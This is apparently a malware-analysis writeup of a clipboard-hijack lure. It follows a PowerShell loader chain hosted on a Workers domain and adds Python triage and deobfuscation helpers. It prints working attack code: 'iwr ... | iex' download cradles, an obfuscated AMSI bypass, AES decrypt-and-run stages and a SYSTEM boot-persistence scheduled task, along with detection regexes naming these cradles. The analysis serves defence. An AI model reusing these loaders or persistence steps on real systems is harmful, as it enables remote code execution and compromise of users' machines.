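# on the first keypress). example.invalid is a placeholder host.
SAMPLE_HTML = """<html><body>
<p>Press any key to view your secure message.</p>
<script>
document.onkeydown = () => {
  const type = "text/plain";
  const clipboardItemData = {
    [type]: 'powershell.exe -ExecutionPolicy Bypass -c "iwr -UseBasicParsing example.invalid|iex";# Enable-Feature',
  };
  navigator.clipboard.write([new ClipboardItem(clipboardItemData)]);
}
</script></body></html>"""

# Ways a page can arm the clipboard from script.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.write(?:Text)?\s*\(|new\s+ClipboardItem\s*\(|execCommand\s*\(\s*['\"]copy", re.I)
# User-interaction hooks the lure attaches the write to.
EVENT_HOOK = re.compile(
    r"\bon(?:keydown|keypress|keyup|click|mousedown|copy)\b"
    r"|addEventListener\s*\(\s*['\"](?:keydown|keypress|keyup|click|mousedown|copy)", re.I)
# Command-line fragments that have no business in a clipboard payload.
CRADLE = re.compile(
    r"powershell(?:\.exe)?|\bmshta\b|cmd(?:\.exe)?\s*/c|\biwr\b|Invoke-WebRequest"
    r"|\biex\b|Invoke-Expression|-ExecutionPolicy\s+Bypass|DownloadString", re.I)


def extract_scripts(html: str) -> list:
    return re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.S | re.I)


def scan_html(html: str) -> dict:
    """Static triage: flag a page that arms the clipboard with a command-line cradle."""
    result = {"clipboard_write": False,
              "event_hook": bool(EVENT_HOOK.search(html)),
              "cradle_strings": []}
    for script in extract_scripts(html):
        if CLIPBOARD_WRITE.search(script):
            result["clipboard_write"] = True
        result["cradle_strings"].extend(m.group(0) for m in CRADLE.finditer(script))
    result["cradle_strings"] = sorted(set(result["cradle_strings"]))
    result["verdict"] = ("clipboard-hijack" if result["clipboard_write"] and result["cradle_strings"]
                         else "review" if result["clipboard_write"] or result["cradle_strings"]
                         else "clean")
    return result


if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
```

A clipboard write alone is common on legitimate pages ("copy link" buttons), and a stray "powershell" string alone is common in documentation, so the verdict only fires when both appear in the same script; either on its own is reported as "review".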
If we send a request to jolly-heart-a4be.oluf-sand.workers.dev we get the following response:
|
echo "">C:/Windows/Temp/ndr8C2E.tmp
|
My first thought is that we need headers that make the server believe the request comes from PowerShell, so I try sending the following request:
|
curl -A "Mozilla/5.0 (Windows NT; Windows NT 10.0; de-DE) WindowsPowerShell/5.1.19041.5737" http://jolly-heart-a4be.oluf-sand.workers.dev
|
Aha! Now we get the following response:
|
echo "">C:/Windows/Temp/ndr8C2E.tmp
$dat="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"
$bytes = [Convert]::FromBase64String($dat)
$ms = New-Object IO.MemoryStream(,$bytes)
$gs = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gs,[Text.Encoding]::UTF8)
$result = $sr.ReadToEnd()
echo $result | iex
|
From the code's logic we can see that it decodes base64 and then decompresses the result with gzip. If we decode and decompress the data in the $dat variable, we get the following PowerShell code:
|
$alojga='siU'
$uzuleck="$([cHAr]([BYte]0x53)+[CHAr]([BytE]0x79)+[CHAR]([bYTe]0x73)+[CHaR](116*93/93)+[cHAR]([byTE]0x65)+[Char]([BYte]0x6d)).$(('Man'+'age'+'ment').NorMAlize([cHAR]([bytE]0x46)+[CHAr]([byTE]0x6f)+[ChaR](106+8)+[ChAR](50+59)+[CHar](68+64-64)) -replace [cHar]([bytE]0x5c)+[cHar](112)+[cHAr]([ByTe]0x7b)+[CHaR]([BytE]0x4d)+[CHAr](110+40-40)+[ChAr](125*29/29)).$([cHAr]([bytE]0x41)+[chAR]([BYte]0x75)+[CHAR]([BYTe]0x74)+[CHAR](111+62-62)+[cHar](109*39/39)+[chaR](97+3-3)+[ChAR](116*95/95)+[cHar]([bYTe]0x69)+[ChAR](111*50/50)+[char](110*98/98)).$(('Am'+$alojga+'tils').normalizE([chAr]([BYTE]0x46)+[cHAr]([bYTe]0x6f)+[CHaR]([bYtE]0x72)+[cHar](87+22)+[cHaR](68)) -replace [CHAR]([ByTe]0x5c)+[CHAR]([BYtE]0x70)+[cHaR](123*34/34)+[CHAr](77)+[chaR]([ByTE]0x6e)+[cHar](125))";$guyhi="+[ChaR](115)+[chAr]([bYte]0x72)+[char](115+112-112)+[chaR]([BYTe]0x70)+[cHaR](101*24/24)+[ChaR](26+83)+[CHAR](99*31/31)+[CHar](11+111)+[Char](111+29-29)+[cHar]([byTe]0x66)+[CHar](4+115)+[Char](107+14-14)+[cHAr](88+13)+[chaR]([BYte]0x72)+[cHaR](120+117-117)+[Char]([bYTe]0x7a)+[chAr]([BYTE]0x62)+[char]([Byte]0x6c)+[cHAR](116*105/105)+[cHaR](6+108)+[cHaR](112+100-100)";[Threading.Thread]::Sleep(1570);
if($env:USERNAME -ne 'jens' -or $env:COMPUTERNAME -ne 'myrupmachine'){return}
$Script:InstallRoot = Join-Path $env:ProgramData "ContosoDeployment"
$Script:LogPath = Join-Path $Script:InstallRoot "logs"
$Script:StateFile = Join-Path $Script:InstallRoot "state.json"
$Script:RegistryRoot = "HKLM:\SOFTWARE\Contoso\Platform"
$Script:ExecutionId = [guid]::NewGuid().ToString()
$Script:StartTime = Get-Date
$ErrorActionPreference = "Stop"
$timestamp = (Get-Date).ToString("yyyy-MM-dd HH:mm:ss.fff")
$formatted = "[$timestamp] [INFO] [$($Script:ExecutionId)] Could not install"
$Enabled = $true
[Ref].Assembly.GetType($uzuleck)."GetfiEld"($([cHaR](97*16/16)+[CHAR](109+55-55)+[cHAR]([byte]0x73)+[cHAr]([BYte]0x69)+[chaR]([ByTe]0x49)+[Char]([Byte]0x6e)+[CHaR]([BytE]0x69)+[cHaR](116*25/25)+[ChaR]([Byte]0x46)+[chaR](97+1-1)+[Char]([ByTe]0x69)+[CHAR](39+69)+[CHar](101+55-55)+[CHAR]([bytE]0x64)),"NonPublic,Static")."SEtValue"($TZpaDwt,$Enabled);
iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/a3a7a35e-2534-4b46-85f0-d3304c34f48a|iex
|
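Two things this analysis has to do repeatedly are unwrap the base64-plus-gzip stage and read through the [char](...) arithmetic that spells strings out one character at a time. The Python below is an added example, not the writeup's own code: decode_gzip_stage does what the $dat wrapper does, and deobfuscate folds runs such as [cHAr]([BYte]0x53)+[CHaR](116*93/93)+... and 'Man'+'age'+'ment' into the literals they produce, which exposes the .NET type and field names the loader reaches via reflection. The expression evaluator assumes the obfuscator's own patterns (hex bytes, a+b-b, a*b/b), so exact integer division is safe; the script it round-trips is constructed.

```python
import base64
import gzip
import io
import re


def decode_gzip_stage(b64_text: str) -> str:
    """Stage wrapper used by the loader: base64 text -> gzip stream -> UTF-8 script."""
    raw = base64.b64decode(b64_text)
    with gzip.GzipFile(fileobj=io.BytesIO(raw)) as gz:
        return gz.read().decode("utf-8")


def encode_gzip_stage(script: str) -> str:
    """Inverse of decode_gzip_stage, used here only to build a constructed sample."""
    return base64.b64encode(gzip.compress(script.encode("utf-8"))).decode()


# The obfuscator hides every character as an integer expression: a hex byte
# ([byte]0x53), a+b-b, a*b/b or a+b. This evaluates such expressions without
# eval(); '/' is treated as exact division (assumption: the a*b/b pattern).
_TOKEN = re.compile(r"\s*(0x[0-9a-fA-F]+|\d+|[+\-*/])")


def eval_int_expr(expr: str) -> int:
    tokens = _TOKEN.findall(expr)

    def num(tok: str) -> int:
        return int(tok, 16) if tok.lower().startswith("0x") else int(tok)

    values, ops = [num(tokens[0])], []
    for i in range(1, len(tokens) - 1, 2):  # * and / bind first
        op, rhs = tokens[i], num(tokens[i + 1])
        if op == "*":
            values[-1] *= rhs
        elif op == "/":
            values[-1] //= rhs
        else:
            ops.append(op)
            values.append(rhs)
    result = values[0]
    for op, value in zip(ops, values[1:]):  # then + and - left to right
        result = result + value if op == "+" else result - value
    return result


_CHAR = r"\[char\]\s*\(\s*(?:\[byte\]\s*)?([0-9a-fA-Fx+\-*/\s]+?)\s*\)"
_CHAR_RUN = re.compile(rf"{_CHAR}(?:\s*\+\s*{_CHAR})*", re.I)
_LITERAL_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def resolve_chars(script: str) -> str:
    """Replace each run [char](e1)+[char](e2)+... with the quoted string it spells."""
    def spell(match: re.Match) -> str:
        exprs = re.findall(_CHAR, match.group(0), re.I)
        return "'" + "".join(chr(eval_int_expr(e)) for e in exprs) + "'"
    return _CHAR_RUN.sub(spell, script)


def merge_literals(script: str) -> str:
    """Fold 'a'+'b'+'c' into 'abc' (repeat until nothing changes)."""
    while True:
        merged = _LITERAL_CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if merged == script:
            return merged
        script = merged


def deobfuscate(script: str) -> str:
    return merge_literals(resolve_chars(script))


if __name__ == "__main__":
    # Constructed sample: the same wrapper as $dat around a harmless script.
    stage = encode_gzip_stage("Write-Output ([char](72)+[char](105*3/3))")
    print(deobfuscate(decode_gzip_stage(stage)))
```

The literal merge pairs quotes naively, which is fine for the concatenation chains this loader uses but can misfire on scripts with apostrophes inside double-quoted strings; check the output against the original when in doubt.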
I quickly spot that there is yet another request to jolly-heart-a4be.oluf-sand.workers.dev in the decoded code, and that it sends data to /update/a3a7a35e-2534-4b46-85f0-d3304c34f48a. If we send a request to this endpoint, we get the following response:
|
$dat="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"
$bytes = [Convert]::FromBase64String($dat)
$ms = New-Object IO.MemoryStream(,$bytes)
$gs = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gs,[Text.Encoding]::UTF8)
$result = $sr.ReadToEnd()
Invoke-Command -ScriptBlock ([scriptblock]::Create($result)) -ArgumentList @("sour", "precision")
|
After decoding and decompressing the data, we get the following PowerShell code:
|
param (
[string]$cow = '',
[string]$fugato = ''
)
$pack = 'B9yxT'
function reactant([int]$i) {
inexpensive($i+55290)
health($i+19051)
heavy($i+38932)
squeal($i+22609)
panel($i+53813)
vanish($i+17317)
improvise($i+65220)
victory($i+44959)
gem($i+26706)
extend($i+33203)
plead($i+65238)
}
$cultivar = '9Z7xulaVl2b1GnWeRRBYT4nxKxr1M9LAc1MCfp+ru4j3N0CC24LewdbQiBwVyznDweapd6tOIyUqSLDV2/SAw8btu3uE1NhPitIUxch9Ht8lwA+rW3vGLL+lRqgEi6uqsmpHj4pyC9fA0oEd6rkKh3wluMlXDCD9q44nq0CCI5FU8RsApk7RljZnmoADgpyutYk67/43leuoKhbXhVELF07+KJKpZWBMadSaY5BBpF4vvlijlP8wveo2ENtN8ICxN0HsCiVjRQdSpzgjjUmaSTEBm7Bcultj9eV/+zUTtl7Xw2N6wzwLnj8T2a9+Ygnx5bDS2YhC/quCdaEof5kcDcHXMKkLBHqU6+HHapuImj2S+HAflh5zFMYnxvGUEMhmC/6PqLAiA9nX+9L01ZqMCDtdQh+7aikd1P2/OWCHLJJ8aH9QkH1wKeHmsjdLA3UxXWHshogBtAve0YszNZjcArBEQoGXzGsQrThRsxV0ogsKu3ZYxCs/UkbVjpVoDHMM4SENNaytZ42AMQTEfV0rLJeFF4tbqpoA51SCbGyzRvLqsBJevYfauTOcGggi0fT5amwVzWeRgcAXt5NRzt3FvN30KW5vugdGAije83hYaxpOAsWM2L096CA7xNM1Hk4vX2iIw9iJG7GNHiCb3PxVuiQX0QJsP6/2Iz+FIqAlZX0PPlasLEGaIZzpSeVI1rbdn01IxJS+k0VDb3FfhCDEA6U8GsAzwhOVSxwRLVtTB47QVa9f'
$precision = '/F3kF8RyMOHT4mrSVBNSHbXJA+7G6kAagtE7dSzHkUM='
function pride([int]$i) {
ale($i+48511)
panther($i+29000)
seed($i+27850)
exultant($i+5084)
tacky($i+2085)
wave($i+59434)
start($i+63922)
independent($i+33913)
boatyard($i+58060)
bow($i+44219)
mislead($i+64694)
someplace($i+43528)
huge($i+34379)
adrenaline($i+55782)
hand-holding($i+27515)
}
$team = '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'
$future = 50281
$raid = 'nBhhJlW88L9ji/rPHkSLGm35yFQBDh5NNH8CTxOfSnJ2ah6sNIemutN51PVXgJ2copQSPjsq+MgV2G7QLbkLt2GO7QIxvwrwilHGyapRTx9kTfytAfASsC6CqePDVQxDZgxwj2kXKGaf4K2oVaxdXzdRezYn2RvLC9vkbDbxeGwM/cIyCWL/Ec5uN3hl9JFDSDgVh9fEQQ5bdGdqHeabENWG7i8DjPoy/8GvpmqIFAy7bmsv7yXBke5kx8ZJI7WE4CdaJH35r6DG8tgZY6Mi4kLA4hSm2B8hLuf0RcbS2VHgunrxban6urk6l694Wwj8ahNyfBnA023VVEAFokNEXcgOnEmmH5mGQG1tYa0fVAImDnQVi3cHIjwBUb4IZVgE0ucACS/AAZDZK8vdlsLJgUpBoa5F2kzmGP4odN9lxnwolwD7n8FIwlnJ+WVuqK8CfuIM8PkgqAy+si+nZ9xrTYeYsqua'
$hub = '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'
$first = 'Wqy'
$tanker = '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'
function envious([int]$i) {
abounding($i+18347)
respite($i+39701)
debt($i+59482)
antecedent($i+6065)
hydroxyl($i+5252)
accept($i+48422)
}
$trouble = 'mm6I00jG1EtUlBvMYB8K'
$son = 3815
function cassock([int]$i) {
midden($i+47992)
orator($i+2354)
patience($i+14240)
heel($i+4923)
tree($i+496)
exception($i+23482)
bun($i+617)
strand($i+46746)
quiet($i+47060)
curriculum($i+16110)
stencil($i+61195)
egg($i+32566)
}
function toffee([int]$i) {
actor($i+65426)
squalid($i+38176)
accuracy($i+55227)
frequency($i+691)
impairment($i+25113)
whorl($i+43559)
warden($i+28694)
desk($i+56127)
day($i+10657)
pollution($i+23548)
skate($i+3605)
swan($i+54232)
successful($i+13949)
vulgar($i+64430)
}
$sour = 'S2z5lEz62YgM5spK6wpA0c2DARJk/geo9+y4IjG2oak1Zs/7yc8wMbVl4/KMqwVQL6WsWqjwXXNOgGyMJulNORj7zNBGdzaqTxR/gEMgYSrzlk7VcL7uJ5d+pxcoRq+5HJX+sIPY9j7W4j/qVBehRoKZeW+BFz5NSXp1i2w4suFUGbdh0FScfk59upild4mV1HzD9I1GMOs0ksRh4ZbgRd4N/t1WHAuqeKiCG2jYn47+GASwIt8OvNLtDiX4/0Dpm+2wRJTlcDLQG48XXKHLlm4gmC0G5fRPzJLChGmxWldBjKowMEyo5/Ow9f6FT5l7OQEofj6fee7O0VzdKNl0rhqZ9XUaNfupCBc1jj0gu1e+zzPZdohzof2u/wl+1zTslPkbC3YzySBmufHQVG1d/OXvlWMTghvk3OIs0l9SMjf3SJSgtKZKGLGloKFAzJ5y'
function demonic([int]$i) {
van($i+55784)
economics($i+48566)
weed($i+11128)
depressive($i+16381)
zampone($i+43219)
alien($i+40794)
puma($i+53379)
overcharge($i+29759)
carpeting($i+46614)
chaplain($i+62796)
}
function brow([int]$i) {
subset($i+65072)
cork($i+22404)
octopus($i+32149)
large($i+3413)
emu($i+3533)
berserk($i+41838)
bonsai($i+26584)
poker($i+47192)
pan($i+7983)
perfume($i+9029)
towering($i+29183)
verse($i+39129)
}
function blush([int]$i) {
uplift($i+40490)
airbag($i+25685)
adapter($i+44307)
mend($i+33526)
laparoscope($i+58654)
sky($i+47273)
}
function population([int]$i) {
board($i+47673)
cricketer($i+55540)
vivo($i+63501)
structure($i+26531)
suburb($i+14703)
consonant($i+33406)
excite($i+19618)
relate($i+35184)
antique($i+60545)
}
function broad([int]$i) {
cream($i+28435)
normalize($i+17492)
sender($i+14883)
spot($i+1015)
gator($i+27898)
workout($i+7274)
conifer($i+16831)
ski($i+44682)
map($i+53320)
cat($i+39757)
bunch($i+20836)
hail($i+55206)
cob($i+64965)
crack($i+23987)
snack($i+45599)
possess($i+56083)
cob($i+29742)
implication($i+50956)
parsnip($i+45719)
}
$college = 'd1XTIr'
function dose([int]$i) {
standoff($i+54336)
precedence($i+35821)
seek($i+13810)
wee($i+48821)
head($i+7284)
hay($i+44324)
station($i+27381)
manufacturing($i+65219)
ferryboat($i+42238)
let($i+27799)
vote($i+2888)
roster($i+347)
iris($i+7377)
pink($i+45999)
logic($i+53735)
hash($i+23411)
principle($i+35633)
}
function arrest([int]$i) {
shearling($i+6313)
brake($i+46058)
honorable($i+15677)
}
$hike = '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'
$epic = 'Ukw'
$nosy = $cow
if ($cow -eq "") {
$nosy = Read-Host -Prompt 'Variable name'
}
$employ = Get-Variable -Name $nosy -ValueOnly
$modification = $fugato
if ($fugato -eq "") {
$modification = Read-Host -Prompt 'Key Variable name'
}
$percent = Get-Variable -Name $modification -ValueOnly
$hiking = [System.Convert]::FromBase64String($employ)
$sister = [System.Convert]::FromBase64String($percent)
$poverty = @{TypeName="Sys"+"t"+"e"+"m."+"SECu"+"R"+"I"+"Ty.CR"+"YPT"+"OGRa"+"PH"+"y"+".a"+"es"+"mANA"+"GeD";Property=@{("mOd"+"E")=[System.Security.Cryptography.CipherMode]::CBC; Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; BlockSize=128;KeySize=256;("iV")=$hiking[0..15];}}
$book = New-Object @poverty
$book.("keY")=$sister
[System.Text.Encoding]::UTF8.GetString($book.("c"+"reA"+"tedEc"+"ryPTO"+"R")().TransformFinalBlock($hiking,16,$hiking.length-16)).Trim([char]0)|&((&g''"cm" ("?"+"?"+'x'))[1])
iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/587e5d6b-202c-4690-9cf4-0ffb672b624b|iex
|
Here there is again a request to jolly-heart-a4be.oluf-sand.workers.dev/update/587e5d6b-202c-4690-9cf4-0ffb672b624b; by making a GET request once more we get the following response:
|
param (
[string]$hum = '',
[string]$hood = ''
)
$cool = 'c1dOTat5fnlq0vk619S2eMF+tZRoY2UyovCrwqxgS44='
$olive = 11820
$run = '1GWZL7Tm'
function fen([int]$i) {
sculptural($i+46380)
weave($i+60834)
awake($i+16352)
apple($i+56265)
truck($i+43544)
dinner($i+42751)
halloween($i+10907)
cap($i+4286)
skean($i+5482)
mare($i+41384)
squid($i+31260)
lay($i+3479)
}
function horn([int]$i) {
roll($i+24578)
fiberglass($i+17916)
interval($i+24624)
side($i+16902)
charter($i+2057)
queen($i+61646)
effector($i+8731)
gnu($i+56615)
team($i+14771)
cymbal($i+40122)
nephew($i+45748)
bag($i+55104)
}
function ferret([int]$i) {
perp($i+25624)
zip($i+6443)
keyboard($i+29339)
boom($i+61989)
zipper($i+63293)
joke($i+40437)
rice($i+3266)
rush($i+33772)
fresco($i+18770)
amount($i+34161)
}
function wed([int]$i) {
pince_nez($i+54134)
blush($i+4645)
frigate($i+11984)
}
$cannon = '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'
function orchid([int]$i) {
slimy($i+14152)
familiarity($i+37212)
worried($i+18299)
entree($i+14606)
exposition($i+29364)
underclothes($i+52426)
ornament($i+56489)
hatchling($i+16377)
savory($i+15669)
wit($i+39930)
cravat($i+31434)
resemblance($i+2433)
carving($i+12259)
pup($i+32737)
standoff($i+14183)
percentage($i+9289)
van($i+15532)
walnut($i+19032)
bat($i+747)
}
function core([int]$i) {
hugger($i+34221)
seep($i+49482)
maternity($i+3156)
bother($i+36300)
armpit($i+52120)
chart($i+30010)
edger($i+29491)
used($i+39016)
creek($i+59324)
gerbil($i+21200)
}
function upstairs([int]$i) {
madam($i+38753)
shelter($i+57843)
vol($i+15108)
SUV($i+10754)
local($i+47023)
female($i+12117)
nail($i+29856)
clarification($i+18458)
be($i+59857)
spectacles($i+42150)
monger($i+60052)
span($i+57330)
bun($i+8659)
dining($i+54253)
clasp($i+21075)
}
$swordfish = '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'
function pickup([int]$i) {
calm($i+54510)
yacht($i+45765)
hut($i+60039)
chemical($i+6019)
reluctance($i+57518)
carboxyl($i+33964)
intent($i+40086)
growth($i+57032)
uncertainty($i+29732)
belt($i+16225)
nifty($i+16900)
communicate($i+17740)
scale($i+6245)
write($i+14605)
beginning($i+8755)
rally($i+4530)
colleague($i+59543)
financing($i+22648)
packet($i+18847)
}
$cottage = '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'
function composer([int]$i) {
bend($i+2081)
dhow($i+39345)
gigantism($i+50212)
waste($i+62740)
sandbar($i+42412)
}
function ascend([int]$i) {
dissect($i+28112)
township($i+52903)
grasp($i+48930)
shock($i+41066)
tangy($i+51825)
ozone($i+45489)
keyboarding($i+44983)
branch($i+7568)
whirlpool($i+8762)
ruler($i+28412)
scimitar($i+21313)
independent($i+34853)
shaky($i+55550)
}
$diver = $hum
if ($hum -eq "") {
$diver = Read-Host -Prompt 'Variable name'
}
$sportsman = Get-Variable -Name $diver -ValueOnly
$die = $hood
if ($hood -eq "") {
$die = Read-Host -Prompt 'Key Variable name'
}
$editor = Get-Variable -Name $die -ValueOnly
$blind = [System.Convert]::FromBase64String($sportsman)
$righteous = [System.Convert]::FromBase64String($editor)
$combative = @{TypeName="sySt"+"Em.se"+"c"+"uRITy"+"."+"cry"+"pTog"+"RA"+"phY."+"AE"+"Sma"+"naGE"+"D";Property=@{("mO"+"de")=[System.Security.Cryptography.CipherMode]::CBC; Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; BlockSize=128;KeySize=256;("I"+"V")=$blind[0..15];}}
$ask = New-Object @combative
$ask.("kE"+"Y")=$righteous
[System.Text.Encoding]::UTF8.GetString($ask.("CReat"+"E"+"dECr"+"Y"+"PT"+"o"+"r")().TransformFinalBlock($blind,16,$blind.length-16)).Trim([char]0)|&((&g''"cm" ("?"+"?"+'x'))[1])
|
Here AES-256-CBC decryption takes place. We can use Python to replicate it:
|
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
cipher_b64 = "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" # $cottage
key_b64 = "c1dOTat5fnlq0vk619S2eMF+tZRoY2UyovCrwqxgS44=" # $cool
cipherdata = base64.b64decode(cipher_b64)
key = base64.b64decode(key_b64)
iv = cipherdata[:16]  # the PowerShell uses the first 16 bytes as the IV
encrypted = cipherdata[16:]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(encrypted), AES.block_size)  # PKCS7, as in the PowerShell
print(plaintext.rstrip(b"\x00").decode())  # mirrors .Trim([char]0)
|
This gives us the following output:
|
$TaskName = "ExampleBootTask"
# Define action
$Action = New-ScheduledTaskAction `
-Execute "powershell.exe" `
-Argument "-NoProfile -Command `"iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/32aebe97-cb2e-4507-a912-9e53e72b9106|iex`""
# Define trigger (at boot)
$Trigger = New-ScheduledTaskTrigger -AtStartup
# Define principal (SYSTEM account, highest privileges)
$Principal = New-ScheduledTaskPrincipal `
-UserId "SYSTEM" `
-LogonType ServiceAccount `
-RunLevel Highest
# If task already exists, remove it
if (Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue) {
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
}
# Register task
Register-ScheduledTask `
-TaskName $TaskName `
-Action $Action `
-Trigger $Trigger `
-Principal $Principal `
-Description "Runs a simple PowerShell command at system startup."
Write-Host "Scheduled task \'$TaskName\' created successfully."
|
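The decrypted stage above is a textbook persistence task: a PowerShell host, a web download piped straight into iex, registered to run as SYSTEM at boot. As an added example (not part of the writeup), the following Python triage helper parses the action, principal and trigger out of a Register-ScheduledTask style script and scores it for exactly that pattern. The TASK_SCRIPT text is an abridged copy of the stage shown above; the indicator weights, the threshold and the benign comparison task are assumptions made for this example.

```python
import re

# Abridged copy of the decrypted scheduled-task stage shown above, used as sample input.
TASK_SCRIPT = r'''
$TaskName = "ExampleBootTask"
$Action = New-ScheduledTaskAction `
-Execute "powershell.exe" `
-Argument "-NoProfile -Command `"iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/32aebe97-cb2e-4507-a912-9e53e72b9106|iex`""
$Trigger = New-ScheduledTaskTrigger -AtStartup
$Principal = New-ScheduledTaskPrincipal `
-UserId "SYSTEM" `
-LogonType ServiceAccount `
-RunLevel Highest
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal
'''

# Constructed benign task for comparison (assumption, not from the page).
BENIGN_TASK = {
    "execute": "powershell.exe",
    "argument": "-File C:\\Scripts\\rotate-logs.ps1",
    "user_id": "svc_backup",
    "run_level": "Limited",
    "trigger": "Daily",
}

# Indicator patterns and weights: assumptions chosen for this example, not a vendor rule set.
INDICATORS = {
    "download_cradle": (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I), 3),
    "invoke_expression": (re.compile(r"\|\s*iex\b|invoke-expression", re.I), 3),
    "no_profile": (re.compile(r"-nop(rofile)?\b", re.I), 1),
    "hidden_or_encoded": (re.compile(r"-(enc|encodedcommand|w(indowstyle)?\s+hidden)\b", re.I), 2),
    # http(s) URL, or a bare host/path like the workers.dev one above
    "remote_location": (re.compile(r"https?://\S+|\b[a-z0-9-]+(?:\.[a-z0-9-]+)+/\S+", re.I), 2),
}
THRESHOLD = 6

def parse_register_task(script: str) -> dict:
    """Pull the action, principal and trigger out of a Register-ScheduledTask style script."""
    def grab(pattern: str, default: str = "") -> str:
        m = re.search(pattern, script, re.I)
        return m.group(1) if m else default
    # PowerShell escapes an embedded double quote as `" inside a double-quoted string.
    argument = grab(r'-Argument\s+"((?:`"|[^"])*)"').replace('`"', '"')
    return {
        "execute": grab(r'-Execute\s+"([^"]+)"'),
        "argument": argument,
        "user_id": grab(r'-UserId\s+"([^"]+)"'),
        "run_level": grab(r"-RunLevel\s+(\w+)"),
        "trigger": "AtStartup" if re.search(r"-AtStartup\b", script, re.I) else "Other",
    }

def score_task(task: dict) -> tuple:
    """Return (score, reasons); higher means more like the persistence stage above."""
    score, reasons = 0, []
    cmdline = f"{task.get('execute', '')} {task.get('argument', '')}"
    if re.search(r"(powershell|pwsh)(\.exe)?$", task.get("execute", ""), re.I):
        score += 1
        reasons.append("powershell_host")
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(cmdline):
            score += weight
            reasons.append(name)
    if task.get("user_id", "").upper() == "SYSTEM" and task.get("trigger") == "AtStartup":
        score += 2
        reasons.append("system_at_boot")
    if task.get("run_level", "").lower() == "highest":
        score += 1
        reasons.append("highest_run_level")
    return score, reasons

def is_suspicious(task: dict) -> bool:
    return score_task(task)[0] >= THRESHOLD

if __name__ == "__main__":
    parsed = parse_register_task(TASK_SCRIPT)
    print(parsed["argument"])
    print(score_task(parsed), is_suspicious(parsed))
    print(score_task(BENIGN_TASK), is_suspicious(BENIGN_TASK))
```

The same fields are what you get from the Task Scheduler event log or from Get-ScheduledTask on a live host, so the scoring half works unchanged on exported task definitions; only the parser is specific to script text.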
Here we see a PowerShell script that creates a scheduled task which runs at system startup. The task runs a PowerShell command that downloads and executes a script from a URL. We use curl again to fetch that script: curl -A "Mozilla/5.0 (Windows NT; Windows NT 10.0; de-DE) WindowsPowerShell/5.1.19041.5737" jolly-heart-a4be.oluf-sand.workers.dev/update/32aebe97-cb2e-4507-a912-9e53e72b9106
This gives us the following output:
|
$dat="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"
$bytes = [Convert]::FromBase64String($dat)
$ms = New-Object IO.MemoryStream(,$bytes)
$gs = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gs,[Text.Encoding]::UTF8)
$result = $sr.ReadToEnd()
Invoke-Command -ScriptBlock ([scriptblock]::Create($result)) -ArgumentList @("criminal", "batting")
|
This again gives a PowerShell script that does AES-256-CBC decryption.
Click to expand the raw payload
|
param (
[string]$osmosis = '',
[string]$quiche = ''
)
$economics = 'KmV9RXm9YDliWGaa8MaWo4psjnuhUmBG9Sgzyy+YEy0guhlJqv4Nm/789kl5sBxc6EjKMJP3o46bT+XumAWbC/BSZYuWBHYN+x8h8bACcYnryqOWKFdMJb4f6fnz4x9ygKvc0o4vdBFaY9qn4dkHdich3G9fhs+IVl6OnI+BuWuQ5siMWOVTga4EHeig/gwyY1hvJ1e/0eFqkFyk24e8OEh1MvYoquTJRXgUv38izdEXBgBZwrd7CdD0NlrxmYwfQs+S3aAbPGF31ilR3A1t9ifi3cYdEpkZIJ8dEDsWBUBICM3pv1leYhwCJoxbelGIeTiVOYJ/p04nLZX/mD3LV3MyYKeo4sC7QX5p3mHLIs/KE2xuCQToYujYfLS2y7PI3fu180G/oPQHO9NybSDaCqbNJ2g='
$examiner = 39162
$loud = 'UAUSi4SXhrb84owq3aAnK+1CRTwEoSle9b/8USGxG0409bb69PiMlPLyVyCoKY4e8WboziZSu3f81dAbM382ziFN6CLhuWir4HZVmDU7qHgAUuwhcvShvrsZHNxSozapAQBIEU9sQ0zziN+5c/r/kXoysu/70z8UXgduD8sKXbK5jO8K2wW7QrCjiiQJmM+CRF7Ez7wsIsPVTusd8YRsjZVYn1UmWBVegUsN8pSgrSowzpy/p8J+zOAqTEbFx9uUSel+d8S7JKANeOdcbQC/maVl+if8XUuSw3hp1WyRhyqQmb8e2pOLeuFm1CNsm2R6BqhbLg/Vf6m1JqcAFSFIEG6YsuAwZZEk1ulWerdu8R9HKJXVhW1ZZVDX+funiD3wPkd39R08Ka4JMifBXwSOVz+36O8='
function pepper([int]$i) {
council($i+37615)
semicircle($i+53814)
percent($i+34862)
wee($i+34782)
}
